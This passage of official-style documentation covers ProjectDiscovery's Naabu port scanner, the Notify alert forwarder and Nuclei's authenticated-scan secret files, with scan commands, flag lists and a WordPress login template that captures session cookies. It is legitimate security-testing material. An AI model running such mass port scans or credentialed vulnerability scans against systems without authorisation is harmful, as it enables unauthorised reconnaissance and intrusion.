go install -v github.com/projectdiscovery/naabu/cmd/naabu@latest
```
Alternatively, download a prebuilt Naabu binary from the GitHub releases page:
```bash
https://github.com/projectdiscovery/naabu/releases/
```
* Download the latest binary for your OS.
* Unzip the ready-to-run binary.
## Installation Notes
* Naabu requires the latest version of [**Go**](https://go.dev/doc/install)
* Add the Go bin path to the system paths. On OSX or Linux, in your terminal use
```
echo 'export PATH=$PATH:$HOME/go/bin' >> $HOME/.bashrc
source $HOME/.bashrc
```
* To add the Go bin path in Windows, [click this link for instructions.](https://www.architectryan.com/2018/03/17/add-to-the-path-on-windows-10/)
* The binary will be located in `$HOME/go/bin/naabu`
# Naabu Overview
A Go-based port scanning tool to quickly enumerate valid ports
## What is **Naabu?**
Naabu is a port scanning tool written in Go that enumerates valid ports for hosts in a fast and reliable manner. It is a really simple tool that does fast SYN/CONNECT/UDP scans on the host or list of hosts and provides all ports that return a reply.
## Features and capabilities
* Fast And Simple **SYN/CONNECT/UDP** probe based scanning
* Optimized for ease of use and **lightweight** on resources
* **DNS** Port scan
* **Automatic IP Deduplication** for DNS port scan
* **IPv4/IPv6** Port scan (**experimental**)
* **Passive** Port enumeration using Shodan [Internetdb](https://internetdb.shodan.io)
* **Host Discovery** scan (**experimental**)
* **NMAP** integration for service discovery
* Multiple input support - **STDIN/HOST/IP/CIDR/ASN**
* Multiple output format support - **JSON/TXT/STDOUT**
## Additional Naabu Resources
As an open source tool with a robust community there are a lot of community-created resources available.
We are happy to share those to offer even more information about our tools.
Sharing these resources **is not formal approval or a recommendation** from ProjectDiscovery.
We cannot provide an endorsement of accuracy or validation that content is up-to-date. Anything shared here should be approached with caution.
* [https://mrshan.medium.com/naabu-port-scanner-why-you-should-use-it-947d8ca025df](https://mrshan.medium.com/naabu-port-scanner-why-you-should-use-it-947d8ca025df)
* [https://highon.coffee/blog/naabu-cheat-sheet/](https://highon.coffee/blog/naabu-cheat-sheet/)
## Support
Questions about using Naabu? Issues working through installation? Cool story or use case you want to share? Get in touch!
Check out the [Help](/help) section of the docs or reach out to us on [Discord](https://discord.com/invite/projectdiscovery).
# Running Naabu
Learn about running Naabu with examples and sample output
For all of the flags and options available for `naabu` be sure to check out the [Usage](/tools/naabu/usage) page. On this page we share examples of running Naabu with specific flags and goals, and the output you can expect from each.
If you have questions, reach out to us through [Help](/help).
## Basic Examples
To run the tool on a target, just use the following command.
```sh
naabu -host hackerone.com
```
This will run the tool against hackerone.com. There are a number of configuration options that you can pass along with this command. The verbose switch `-v` can be used to display verbose information.
```console
naabu -host hackerone.com
__
___ ___ ___ _/ / __ __
/ _ \/ _ \/ _ \/ _ \/ // /
/_//_/\_,_/\_,_/_.__/\_,_/ v2.0.3
projectdiscovery.io
[WRN] Use with caution. You are responsible for your actions
[WRN] Developers assume no liability and are not responsible for any misuse or damage.
[INF] Running SYN scan with root privileges
[INF] Found 4 ports on host hackerone.com (104.16.100.52)
hackerone.com:80
hackerone.com:443
hackerone.com:8443
hackerone.com:8080
```
The ports to scan for on the host can be specified via `-p` parameter (udp ports must be expressed as `u:port`). It takes nmap format ports and runs enumeration on them.
```sh
naabu -p 80,443,21-23,u:53 -host hackerone.com
```
By default, Naabu checks for nmap's `Top 100` ports. It supports the following built-in port lists -
| Flag | Description |
| ----------------- | ------------------------------------ |
| `-top-ports 100` | Scan for nmap top **100** port |
| `-top-ports 1000` | Scan for nmap top **1000** port |
| `-p - ` | Scan for full ports from **1-65535** |
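For example, to scan nmap's top 1000 ports with the flag shown above:
```sh
naabu -host hackerone.com -top-ports 1000
```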
You can also specify specific ports which you would like to exclude from the scan.
```sh
naabu -p - -exclude-ports 80,443
```
To run naabu on a list of hosts, the `-list` option can be used.
```sh
naabu -list hosts.txt
```
To run naabu on an ASN, AS input can be used. It takes the IP addresses available for the given ASN and runs the enumeration on them.
```console
echo AS14421 | naabu -p 80,443
216.101.17.249:80
216.101.17.249:443
216.101.17.248:443
216.101.17.252:443
216.101.17.251:80
216.101.17.251:443
216.101.17.250:443
216.101.17.250:80
```
You can also get output in JSON format using the `-json` switch. This switch saves the output in the JSON lines format.
```console
naabu -host 104.16.99.52 -json
{"ip":"104.16.99.52","port":443}
{"ip":"104.16.99.52","port":80}
```
The ports discovered can be piped to other tools too. For example, you can pipe the ports discovered by naabu to [httpx](https://github.com/projectdiscovery/httpx) which will then find running http servers on the host.
```console
echo hackerone.com | naabu -silent | httpx -silent
http://hackerone.com:8443
http://hackerone.com:443
http://hackerone.com:8080
http://hackerone.com:80
```
The speed can be controlled by changing the value of the `rate` flag, which represents the number of packets per second. Increasing it while processing hosts may lead to increased false-positive rates, so it is recommended to keep it at a reasonable level.
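For example, a conservative sketch that throttles the scan to 100 packets per second:
```sh
naabu -host hackerone.com -rate 100
```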
# IPv4 and IPv6
Naabu supports both IPv4 and IPv6. Both ranges can be piped together as input. If IPv6 is used, connectivity must be correctly configured, and the network interface must have an IPv6 address assigned (`inet6`) and a default gateway.
```console
echo hackerone.com | dnsx -resp-only -a -aaaa -silent | naabu -p 80 -silent
104.16.99.52:80
104.16.100.52:80
2606:4700::6810:6434:80
2606:4700::6810:6334:80
```
The option `-ip-version 6` makes the tool use IPv6 addresses while resolving domain names.
```console
echo hackerone.com | ./naabu -p 80 -ip-version 6
__
___ ___ ___ _/ / __ __
/ _ \/ _ \/ _ \/ _ \/ // /
/_//_/\_,_/\_,_/_.__/\_,_/ v2.0.8
projectdiscovery.io
Use with caution. You are responsible for your actions
Developers assume no liability and are not responsible for any misuse or damage.
[INF] Running CONNECT scan with non root privileges
[INF] Found 1 ports on host hackerone.com (2606:4700::6810:6334)
hackerone.com:80
```
To scan all the IPs of both versions, `-ip-version 4,6` can be used along with the `-scan-all-ips` flag.
```console
echo hackerone.com | ./naabu -iv 4,6 -sa -p 80 -silent
[INF] Found 1 ports on host hackerone.com (104.16.100.52)
hackerone.com:80
[INF] Found 1 ports on host hackerone.com (104.16.99.52)
hackerone.com:80
[INF] Found 1 ports on host hackerone.com (2606:4700::6810:6334)
hackerone.com:80
[INF] Found 1 ports on host hackerone.com (2606:4700::6810:6434)
hackerone.com:80
```
# Host Discovery
Naabu optionally supports multiple methods to perform host discovery, as outlined below. Host discovery runs automatically before a connect/SYN scan begins if the process has enough privileges. The `-sn` flag instructs the tool to perform host discovery only, while the `-Pn` flag skips the host discovery phase. Host discovery is performed using multiple internal methods; the desired approach can be selected by setting the available options (an example follows the list below).
Available options to perform host discovery:
* **ARP** ping (`-arp`)
* TCP **SYN** ping (`-ps 80`)
* TCP **ACK** ping (`-pa 443`)
* ICMP **echo** ping (`-pe`)
* ICMP **timestamp** ping (`-pp`)
* ICMP **address mask** ping (`-pm`)
* IPv6 **neighbor discovery** (`-nd`)
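For example, a sketch that performs host discovery only (`-sn`) using ICMP echo and TCP SYN probes (the CIDR range is illustrative):
```sh
naabu -host 192.168.1.0/24 -sn -pe -ps 80
```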
# Configuration file
Naabu supports a config file, located by default at `$HOME/.config/naabu/config.yaml`. It allows you to define any flag in the config file and set default values to include for all scans.
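For example, a hypothetical sketch of a config file that sets defaults for every scan (the keys are assumed to mirror the CLI flag names):
```sh
# assumed keys mirroring the -top-ports and -rate flags
cat > $HOME/.config/naabu/config.yaml <<'EOF'
top-ports: 1000
rate: 500
EOF
```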
# Nmap integration
We have integrated nmap support for service discovery, and for any additional scans nmap supports, on the results found by Naabu; make sure you have `nmap` installed to use this feature.
To use it, the `nmap-cli` flag can be used followed by an nmap command, for example:
```console
echo hackerone.com | naabu -nmap-cli 'nmap -sV -oX nmap-output'
__
___ ___ ___ _/ / __ __
/ _ \/ _ \/ _ \/ _ \/ // /
/_//_/\_,_/\_,_/_.__/\_,_/ v2.0.0
projectdiscovery.io
[WRN] Use with caution. You are responsible for your actions
[WRN] Developers assume no liability and are not responsible for any misuse or damage.
[INF] Running TCP/ICMP/SYN scan with root privileges
[INF] Found 4 ports on host hackerone.com (104.16.99.52)
hackerone.com:443
hackerone.com:80
hackerone.com:8443
hackerone.com:8080
[INF] Running nmap command: nmap -sV -p 80,8443,8080,443 104.16.99.52
Starting Nmap 7.01 ( https://nmap.org ) at 2020-09-23 05:02 UTC
Nmap scan report for 104.16.99.52
Host is up (0.0021s latency).
PORT STATE SERVICE VERSION
80/tcp open http cloudflare
443/tcp open ssl/https cloudflare
8080/tcp open http-proxy cloudflare
8443/tcp open ssl/https-alt cloudflare
```
# CDN/WAF Exclusion
Naabu also supports excluding CDN/WAF IPs from port scanning. If used, only ports `80` and `443` are scanned for those IPs. This feature can be enabled with the `exclude-cdn` flag.
Currently `cloudflare`, `akamai`, `incapsula` and `sucuri` IPs are supported for exclusion.
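For example, combining CDN exclusion with the `-display-cdn` flag to show which CDN is in use:
```sh
naabu -host hackerone.com -exclude-cdn -display-cdn
```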
# Scan Status
Naabu exposes JSON scan info on a local port bound to localhost at `http://localhost:63636` (the port can be changed via the `-metrics-port` flag).
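While a scan is running, the scan info can be fetched from another terminal; a minimal sketch:
```sh
curl http://localhost:63636
```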
# Using naabu as a library
The following sample program scans port `80` of `scanme.sh`. The results are returned via the `OnResult` callback:
```go
package main
import (
"log"
"github.com/projectdiscovery/goflags"
"github.com/projectdiscovery/naabu/v2/pkg/result"
"github.com/projectdiscovery/naabu/v2/pkg/runner"
)
func main() {
options := runner.Options{
Host: goflags.StringSlice{"scanme.sh"},
ScanType: "s",
OnResult: func(hr *result.HostResult) {
log.Println(hr.Host, hr.Ports)
},
Ports: "80",
}
naabuRunner, err := runner.NewRunner(&options)
if err != nil {
log.Fatal(err)
}
defer naabuRunner.Close()
naabuRunner.RunEnumeration()
}
```
# Naabu Usage
Review Naabu usage including flags, configs, and optimization
## Access Help
Use `naabu -h` to display all help options.
## Naabu Help Options
```yaml
Usage:
./naabu [flags]
INPUT:
-host string[] hosts to scan ports for (comma-separated)
-list, -l string list of hosts to scan ports (file)
-exclude-hosts, -eh string hosts to exclude from the scan (comma-separated)
-exclude-file, -ef string list of hosts to exclude from scan (file)
PORT:
-port, -p string ports to scan (80,443, 100-200)
-top-ports, -tp string top ports to scan (default 100) [full,100,1000]
-exclude-ports, -ep string ports to exclude from scan (comma-separated)
-ports-file, -pf string list of ports to scan (file)
-port-threshold, -pts int port threshold to skip port scan for the host
-exclude-cdn, -ec skip full port scans for CDN/WAF (only scan for port 80,443)
-display-cdn, -cdn display cdn in use
RATE-LIMIT:
-c int general internal worker threads (default 25)
-rate int packets to send per second (default 1000)
UPDATE:
-up, -update update naabu to latest version
-duc, -disable-update-check disable automatic naabu update check
OUTPUT:
-o, -output string file to write output to (optional)
-j, -json write output in JSON lines format
-csv write output in csv format
CONFIGURATION:
-scan-all-ips, -sa scan all the IP's associated with DNS record
-ip-version, -iv string[] ip version to scan of hostname (4,6) - (default 4)
-scan-type, -s string type of port scan (SYN/CONNECT) (default "s")
-source-ip string source ip and port (x.x.x.x:yyy)
-interface-list, -il list available interfaces and public ip
-interface, -i string network Interface to use for port scan
-nmap invoke nmap scan on targets (nmap must be installed) - Deprecated
-nmap-cli string nmap command to run on found results (example: -nmap-cli 'nmap -sV')
-r string list of custom resolver dns resolution (comma separated or from file)
-proxy string socks5 proxy (ip[:port] / fqdn[:port])
-proxy-auth string socks5 proxy authentication (username:password)
-resume resume scan using resume.cfg
-stream stream mode (disables resume, nmap, verify, retries, shuffling, etc)
-passive display passive open ports using shodan internetdb api
-irt, -input-read-timeout value timeout on input read (default 3m0s)
-no-stdin Disable Stdin processing
HOST-DISCOVERY:
-sn, -host-discovery Perform Only Host Discovery
-Pn, -skip-host-discovery Skip Host discovery
-ps, -probe-tcp-syn string[] TCP SYN Ping (host discovery needs to be enabled)
-pa, -probe-tcp-ack string[] TCP ACK Ping (host discovery needs to be enabled)
-pe, -probe-icmp-echo ICMP echo request Ping (host discovery needs to be enabled)
-pp, -probe-icmp-timestamp ICMP timestamp request Ping (host discovery needs to be enabled)
-pm, -probe-icmp-address-mask ICMP address mask request Ping (host discovery needs to be enabled)
-arp, -arp-ping ARP ping (host discovery needs to be enabled)
-nd, -nd-ping IPv6 Neighbor Discovery (host discovery needs to be enabled)
-rev-ptr Reverse PTR lookup for input ips
OPTIMIZATION:
-retries int number of retries for the port scan (default 3)
-timeout int millisecond to wait before timing out (default 1000)
-warm-up-time int time in seconds between scan phases (default 2)
-ping ping probes for verification of host
-verify validate the ports again with TCP verification
DEBUG:
-health-check, -hc run diagnostic check up
-debug display debugging information
-verbose, -v display verbose output
-no-color, -nc disable colors in CLI output
-silent display only results in output
-version display version of naabu
-stats display stats of the running scan (deprecated)
-si, -stats-interval int number of seconds to wait between showing a statistics update (deprecated) (default 5)
-mp, -metrics-port int port to expose nuclei metrics on (default 63636)
```
# Notes on Usage
* Naabu allows arbitrary binary execution as a feature to support [nmap integration](https://github.com/projectdiscovery/naabu#nmap-integration).
* Naabu is designed to scan ports on multiple hosts / mass port scanning.
* Naabu is configured by default with the assumption that you are running it from a VPS.
* We suggest tuning the flags / rate if running Naabu from a local system.
* For best results, run Naabu as **root** user.
# Notify Install
Learn how to install Notify and get started
Enter the command below in a terminal to install Notify using Go.
```bash
go install -v github.com/projectdiscovery/notify/cmd/notify@latest
```
## Installation Notes
* Notify requires the latest version of [**Go**](https://go.dev/doc/install)
# Notify Overview
A Go-based package to streamline and publish output of tools to multiple locations
Notify is a Go-based package designed to streamline the process of monitoring the output from various tools or files. It enables users to pipe this output directly and publish it to a selection of supported platforms.
## Overview
Notify is highly versatile, serving as a crucial link in automating the notification process across different communication platforms, thereby enhancing the efficiency of monitoring and reporting in security operations, development workflows, or any scenario requiring real-time alerts based on tool outputs or file changes.
Check out [the GitHub repo here](https://github.com/projectdiscovery/notify).
## Features
* Support for File / Pipe input
* Support Line by Line / Bulk Post
* Support using Single / Multiple providers
* Support for custom Web-hooks
* Support custom data formatting
### Supported Tools
* Slack
* Discord
* Telegram
* Pushover
* Email
* Microsoft Teams
* Google Chat
## Support
Questions about using Notify? Issues working through installation? Cool story or use case you want to share? Get in touch!
Reach out to us on [Discord](https://discord.com/invite/projectdiscovery).
# Notify Provider Config
Learn how to set up Notify's provider configuration
The default provider config file can be created at `$HOME/.config/notify/provider-config.yaml`.
Each provider (`slack`, `discord`, etc.) is specified at the top level by name, and can then have one to many configurations for that provider, each identified by a unique `id` field.
## Slack
**Fields:**
* `slack_channel`: The Slack channel to post to
* `slack_username`: The name of the bot to post as
* `slack_format`: By default just `{{data}}`, but you can specify more formatting details
* `slack_webhook_url`: The URL for the Slack integration webhook (See [Slack help for more information](https://slack.com/help/articles/115005265063-Incoming-webhooks-for-Slack))
**Example:**
```yaml
slack:
  - id: "slack"
    slack_channel: "recon"
    slack_username: "test"
    slack_format: "{{data}}"
    slack_webhook_url: "https://hooks.slack.com/services/XXXXXX"
  - id: "vulns"
    slack_channel: "vulns"
    slack_username: "test"
    slack_format: "{{data}}"
    slack_webhook_url: "https://hooks.slack.com/services/XXXXXX"
```
## Discord
```yaml
discord:
  - id: "crawl"
    discord_channel: "crawl"
    discord_username: "test"
    discord_format: "{{data}}"
    discord_webhook_url: "https://discord.com/api/webhooks/XXXXXXXX"
  - id: "subs"
    discord_channel: "subs"
    discord_username: "test"
    discord_format: "{{data}}"
    discord_webhook_url: "https://discord.com/api/webhooks/XXXXXXXX"
```
## Telegram
```yaml
telegram:
  - id: "tel"
    telegram_api_key: "XXXXXXXXXXXX"
    telegram_chat_id: "XXXXXXXX"
    telegram_format: "{{data}}"
    telegram_parsemode: "Markdown" # None/Markdown/MarkdownV2/HTML (https://core.telegram.org/bots/api#formatting-options)
```
## Pushover
```yaml
pushover:
  - id: "push"
    pushover_user_key: "XXXX"
    pushover_api_token: "YYYY"
    pushover_format: "{{data}}"
    pushover_devices:
      - "iphone"
```
## Email (SMTP)
```yaml
smtp:
  - id: email
    smtp_server: mail.example.com
    smtp_username: test@example.com
    smtp_password: password
    from_address: from@email.com
    smtp_cc:
      - to@email.com
    smtp_format: "{{data}}"
    subject: "Email subject"
    smtp_html: false
    smtp_disable_starttls: false
```
## Google Chat
```yaml
googlechat:
  - id: "gc"
    key: "XXXXXXXX"
    token: "XXXXXX"
    space: "XXXXXX"
    google_chat_format: "{{data}}"
```
## Microsoft Teams
```yaml
teams:
  - id: "recon"
    teams_webhook_url: "https://.webhook.office.com/webhookb2/xx@xx/IncomingWebhook/xx"
    teams_format: "{{data}}"
```
## Gotify
```yaml
gotify:
  - id: 'gotify'
    gotify_host: 'XXXXXX'
    gotify_port: '80'
    gotify_token: 'XXXXXX'
    gotify_format: '{{data}}'
    gotify_disabletls: false
    gotify_title: "recon"
```
## Custom Webhook
```yaml
custom:
  - id: webhook
    custom_webhook_url: http://host/api/webhook
    custom_method: GET
    custom_format: '{{data}}'
    custom_headers:
      Content-Type: application/json
      X-Api-Key: XXXXX
  - id: webhookJson
    custom_webhook_url: http://host/api/webhook
    custom_method: GET
    custom_format: '{"text":{{dataJsonString}} }'
    custom_headers:
      Content-Type: application/json
      X-Api-Key: XXXXX
  - id: webhook
    custom_webhook_url: http://host/api/webhook
    custom_method: GET
    custom_sprig: '{"text":"{{ .url }}"}'
    custom_headers:
      Content-Type: application/json
      X-Api-Key: XXXXX
```
# Running Notify
Learn about running Notify with details on variables and examples
For all of the flags and options available for **Notify** be sure to check out the [Usage](/tools/notify/usage) page.
If you have questions, reach out to us through [Help](/help).
## Basic Usage
Notify supports piping the output of any tool (or an output file) and sending it to the configured provider(s) (e.g., a Discord or Slack channel) as notifications.
### Send notification using piped (stdin) output
```sh
subfinder -d hackerone.com | notify -bulk
```
![image](https://user-images.githubusercontent.com/8293321/130240854-e3031bc6-ecc8-47f8-9654-4c58e09cc622.png)
### Send notification using output file
```sh
subfinder -d hackerone.com -o h1.txt; notify -data h1.txt
```
### Send notification using output file in bulk mode
```sh
subfinder -d hackerone.com -o h1.txt; notify -data h1.txt -bulk
```
### Send notification using output file to specific providers
```sh
subfinder -d hackerone.com -o h1.txt; notify -data h1.txt -bulk -provider discord,slack
```
### Send notification using output file to specific IDs
```sh
subfinder -d hackerone.com -o h1.txt; notify -data h1.txt -bulk -id recon,vulns,scan
```
## Example Uses
The following command enumerates subdomains using [SubFinder](https://github.com/projectdiscovery/subfinder), probes for live URLs using [httpx](https://github.com/projectdiscovery/httpx), runs [Nuclei](https://github.com/projectdiscovery/nuclei) templates, and sends the Nuclei results as notifications to the configured provider(s).
```sh
subfinder -d intigriti.com | httpx | nuclei -tags exposure -o output.txt; notify -bulk -data output.txt
```
## Provider Config
The tool uses the default provider config (`$HOME/.config/notify/provider-config.yaml`); a custom one can also be specified via the CLI using the **provider-config** flag.
To run the tool with a custom provider config, use the following command.
```sh
notify -provider-config providers.yaml
```
## Notify Config
Notify flags can be configured in the default config (`$HOME/.config/notify/config.yaml`), or a custom config can be provided using the `config` flag.
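For example, a minimal sketch (the file names here are illustrative):
```sh
# Use a custom flag config and send a results file in bulk mode.
notify -config notify-config.yaml -data output.txt -bulk
```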
## Notes
* By default, Notify sends notifications line by line
* Use `-bulk` to send the notification as an entire message (messages might be chunked)
## References
* [Creating Slack webhook](https://slack.com/intl/en-it/help/articles/115005265063-Incoming-webhooks-for-Slack)
* [Creating Discord webhook](https://support.discord.com/hc/en-us/articles/228383668-Intro-to-Webhooks)
* [Creating Telegram bot](https://core.telegram.org/bots#3-how-do-i-create-a-bot)
* [Creating Pushover Token](https://github.com/containrrr/shoutrrr/blob/main/docs/services/pushover.md)
Notify is made with 🖤 by the [projectdiscovery](https://projectdiscovery.io) team.
# Notify Usage
Learn Notify usage including flags and filters
## Access help
Use `notify -h` to display all of the help options.
## Notify options
| Flag | Description | Example |
| ----------------------- | -------------------------------------------------- | ------------------------------------- |
| `-bulk` | enable bulk processing | `notify -bulk` |
| `-char-limit` | max character limit per message (default 4000) | `notify -cl 2000` |
| `-config` | notify configuration file | `notify -config config.yaml` |
| `-data` | input file to send for notify | `notify -i test.txt` |
| `-delay` | delay in seconds between each notification | `notify -d 2` |
| `-id` | id to send the notification to (optional) | `notify -id recon,scans` |
| `-msg-format` | add custom formatting to message | `notify -mf Hey {{data}}` |
| `-no-color` | disable colors in output | `notify -nc` |
| `-provider-config` | provider config path | `notify -pc provider.yaml` |
| `-provider` | provider to send the notification to (optional) | `notify -p slack,telegram` |
| `-proxy` | http proxy to use with notify | `notify -proxy http://127.0.0.1:8080` |
| `-rate-limit` | maximum number of HTTP requests to send per second | `notify -rl 1` |
| `-silent` | enable silent mode | `notify -silent` |
| `-verbose` | enable verbose mode | `notify -verbose` |
| `-version` | display version | `notify -version` |
| `-update` | updates to latest version | `notify -update` |
| `-disable-update-check` | disables automatic update check | `notify -duc` |
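Putting several of these options together, a hedged sketch (the provider and id values are illustrative and must match your provider config):
```sh
# Send subfinder output in bulk to the slack and discord providers,
# limited to one HTTP request per second.
subfinder -d example.com | notify -bulk -provider slack,discord -id recon,vulns -rate-limit 1
```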
# Authenticated Scans
Learn about scanning targets behind authentication with Nuclei
## What is an **Authenticated Scan** ?
There are some scenarios when running a Nuclei scan on a target might not be enough to find vulnerabilities. If a target is protected by login, then the scan will not be able to access those protected endpoints. This means vulnerabilities that are only accessible after logging in will not be found.
This is why authenticating with targets is important. Before **Nuclei v3.2.0**, you could only authenticate by passing a header with the `-H` flag, but this limits the scope of authentication and is not a scalable solution, since authentication would need to be performed and the headers updated manually.
To solve this issue, Nuclei v3.2.0 introduces a **new specification for generic client-side authentication** that allows apps like Nuclei to authenticate with targets. We call this format the `Secret File`, and it is managed through a YAML file that contains authentication-related configuration.
This functionality is under development for other ProjectDiscovery Tools.
## Specification
Since authentication can be done in multiple ways, for example using 3rd-party services like OAuth, custom login, SSO, Bearer auth and more, this specification categorizes authentication into two types: static authentication and dynamic authentication.
### Static Authentication
This approach involves a single, static secret that doesn't change frequently and serves as a direct indicator of an authenticated HTTP session. Examples include API Keys or credentials used in Basic Authentication (username and password).
### Dynamic Authentication
This method requires multiple, frequently changing secrets to manage a session. It's typical of processes like a social login or OAuth. In dynamic authentication, one set of credentials (for example: username and password) is used for the initial authentication, while additional elements (such as a session cookie or header) are employed to maintain the session's state.
### Dealing with Dynamic Authentication
Implementing and managing static authentication is easy, but dealing with dynamic authentication is more complex due to the multiple entities, secrets, and authentication flows involved. Some cases might require browser-guided authentication, while others might be achievable with an auth flow.
A common solution is to capture and generate a login flow/sequence using a browser and then feed that script to the app handling the authentication.
To make this process easy, familiar, and scalable (users should be able to scan thousands of targets with authentication without much hassle), we leverage the existing rich ecosystem of `nuclei-templates`. These are written in YAML, are scalable, and come with a powerful engine.
We achieve this scalability by reusing and extending our `default-login` templates library. We are continuously adding templates for different apps and services, and these templates can then be referenced in the `Secret File` to perform authentication.
### Scope of Authentication
It is recommended to send authentication-related data to only those targets that use and require them, instead of sharing them globally and risk leaking secrets to third parties.
To limit the scope of a particular secret, we have introduced two fields, `domains` & `domains-regex` (mutually exclusive), which can be used to limit the scope of a secret to a particular set of targets.
Use a wildcard like `.*` to send a secret to all targets. Only one secret can be used for a particular target; if multiple secrets are found for a target, the first one will be used, with priority given to `domains` over `domains-regex`.
### Security & Storing Secret
Secrets do not need to be hardcoded in the `Secret File` configuration; we support the use of third-party secret management systems to templatize and manage secrets.
### Integrations with Secret Management Systems
We are currently exploring integrations with popular secret management systems for easy and secure management of secrets.
We are prioritizing support for:
* **1Password**
* **Hashicorp Vault**
* **AWS Secrets Manager**
### Skipping Secret File
This feature is available in Nuclei **v3.3.1**.
If you provide a secret file to the Nuclei engine, it will automatically configure authentication or authorization for each request in the executed templates. If you want to skip the secret configuration from the secret file and instead use hardcoded secrets or variables in specific templates, you can use the `skip-secret-file` *(bool)* option. By setting this property to **true**, Nuclei will not apply the secrets to each request in those templates.
**Example**
```yaml
variables:
  username: foo
  password: bar

http:
  - raw:
      - |
        GET /some-restricted-page HTTP/1.1
        Host: {{Hostname}}
        Accept: application/json
        Authorization: Basic {{base64(concat(username, ":", password))}}
    skip-secret-file: true
```
## Secret File Formats
YAML format of Secret File as of **Nuclei v3.2.0**:
```yaml
# static secrets
static:
  # 1. Basic Auth based auth
  - type: basicauth
    domains:
      - scanme.sh
    username: test
    password: test

  # 2. API Key (via query parameters) based auth
  - type: query
    domains:
      - example.com
    params:
      - key: token
        value: 1a2b3c4d5e6f7g8h9i0j

  # 3. Bearer Token based auth
  - type: bearertoken
    domains-regex:
      - .*scanme.sh
      - .*pdtm.sh
    token: test

  # 4. Custom Header based auth
  - type: header
    domains:
      - api.projectdiscovery.io
      - cve.projectdiscovery.io
      - chaos.projectdiscovery.io
    headers:
      - key: x-pdcp-key
        value:

  # 5. Cookie based auth
  - type: cookie
    domains:
      - scanme.sh
    cookies:
      - key: PHPSESSID
        value: 1a2b3c4d5e6f7g8h9i0j
        # raw: "PHPSESSID=1a2b3c4d5e6f7g8h9i0j" (an alternative way to specify cookie value)

# dynamic secrets
dynamic:
  # An example dynamic login to WordPress using the REST API
  - template: /path/to/wordpress-login.yaml
    variables:
      - key: username
        value: pdteam
      - key: password
        value: nuclei-fuzz
    input: auth-server.projectdiscovery.io # optional input/target, not required if target is hardcoded in template
    # once login is successful, this can be used in the below templatized static secret
    type: cookie
    domains:
      - .*wp.*projectdiscovery.io
    cookies:
      - raw: "{{wp-global-cookie}}"
      - raw: "{{wp-admin-cookie}}"
      - raw: "{{wp-plugin-cookie}}"
    # Note: This (^) is a static secret in a templatized form,
    # so it can be any of the static secret types and is not limited to just `cookie`.
```
## Secret File Fields
Here's a brief explanation of each field in the secret file:
### `type`
This field specifies the type of static secret being used and determines where the secret should be updated in the request. The following types are supported:
* `basicauth`: Basic Authentication
* `query`: Query Parameters
* `bearertoken`: Bearer Token
* `header`: Custom Header
* `cookie`: Cookie
### `domains`
This field is used to specify the domains for which the secret should be used. If the target domain matches any of the domains specified here, the secret will be used for that target. This field is mutually exclusive with `domains-regex` and can be used to limit the scope of a secret to a particular set of targets.
Example:
```yaml
domains:
  - scanme.sh
  - example.com
```
### `domains-regex`
This field is used to specify the domains for which the secret should be used using regex. If the target domain matches any of the regex specified here, the secret will be used for that target. This field is mutually exclusive with `domains` and can be used to limit the scope of a secret to a particular set of targets.
Example:
```yaml
domains-regex:
  - .*projectdiscovery.io
  - .*pdtm.sh
```
### `username` & `password`
These fields are used to specify the username and password for Basic Authentication and can only be used with `type: basicauth`.
Example:
```yaml
type: basicauth
domains:
  - scanme.sh
username: test
password: test
```
### `params`
Params is a list of key-value pairs that are used to specify the query parameters for the request. This field can only be used with `type: query`.
Example:
```yaml
type: query
domains:
  - example.com
params:
  - key: token
    value: 1a2b3c4d5e6f7g8h9i0j
```
### `token`
This field is used to specify the Bearer Token for the request and can only be used with `type: bearertoken`.
Example:
```yaml
type: bearertoken
domains-regex:
  - .*scanme.sh
  - .*pdtm.sh
token: 6f7g8h9i0j1a2b3c4d5e
```
### `headers`
Headers is a list of key-value pairs that are used to specify the custom headers for the request. This field can only be used with `type: header`.
Example:
```yaml
type: header
domains:
  - api.projectdiscovery.io
  - cve.projectdiscovery.io
  - chaos.projectdiscovery.io
headers:
  - key: x-pdcp-key
    value:
```
### `cookies`
Cookies is a list of key-value pairs that are used to specify the cookies for the request. This field can only be used with `type: cookie`.
Example:
```yaml
type: cookie
domains:
  - scanme.sh
cookies:
  - key: PHPSESSID
    value: 1a2b3c4d5e6f7g8h9i0j
    # raw: "PHPSESSID=1a2b3c4d5e6f7g8h9i0j" (an alternative way to specify cookie value)
```
### `template`
`template` contains the absolute path, or the path relative to the nuclei-templates directory, of the template file that will be used to authenticate with the target. This field can only be used with `type: dynamic`.
A template used for dynamic authentication should accept `variables` and optionally `input`, and should return the session data via an extractor. The session data can then be used in the templatized static secret.
Example:
In this example, a username and password are used to log in to a WordPress instance using the REST API, and the session data is exported via extractors.
```yaml
id: wordpress-login

info:
  name: WordPress Login
  author: pdteam
  severity: info
  description: |
    WordPress Login template to use in workflows for authenticated wordpress testing.
  tags: wordpress,login

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Origin: {{RootURL}}
        Content-Type: application/x-www-form-urlencoded
        Cookie: wordpress_test_cookie=WP%20Cookie%20check

        log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1

    cookie-reuse: true
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 302
      - type: word
        part: header
        words:
          - '/wp-admin'
          - 'wordpress_logged_in'
        condition: and

    extractors:
      - type: regex
        name: wp-plugin-cookie
        part: header
        internal: true
        regex:
          - "Set-Cookie: .+?; path=/wp-content/plugins; HttpOnly"

      - type: regex
        name: wp-admin-cookie
        part: header
        internal: true
        regex:
          - "Set-Cookie: .+?; path=/wp-admin; HttpOnly"

      - type: regex
        name: wp-global-cookie
        part: header
        internal: true
        regex:
          - "Set-Cookie: .+?; path=/; HttpOnly"
```
### `variables`
`variables` is a list of key-value pairs used to specify the variables for the template. This field can only be used with `type: dynamic` and is only required if the template requires variables.
Example:
```yaml
variables:
  - key: username
    value: pdteam
  - key: password
    value: nuclei-fuzz
```
### `input`
`input` is an optional input/target for the template to be executed on, and is only required if the target is not hardcoded in the template. Specifying `input` here allows easy switching between dev and prod environments compared to hardcoding the target in the template.
Example:
```yaml
input: auth-server.projectdiscovery.io
```
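With the secret file saved (for example as `secrets.yaml`), it can be passed to a scan with Nuclei's secret-file flag; a minimal sketch:
```sh
# Run an authenticated scan using the secrets defined in secrets.yaml.
nuclei -u https://scanme.sh -sf secrets.yaml
```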
# Nuclei FAQ
Common questions and answers about Nuclei
If you have other issues to report we'd love to share those with the community. Please join our [Discord server](https://discord.gg/projectdiscovery), or reach out to us on [GitHub](https://github.com/projectdiscovery).
## General
Questions and answers on general topics for Nuclei.
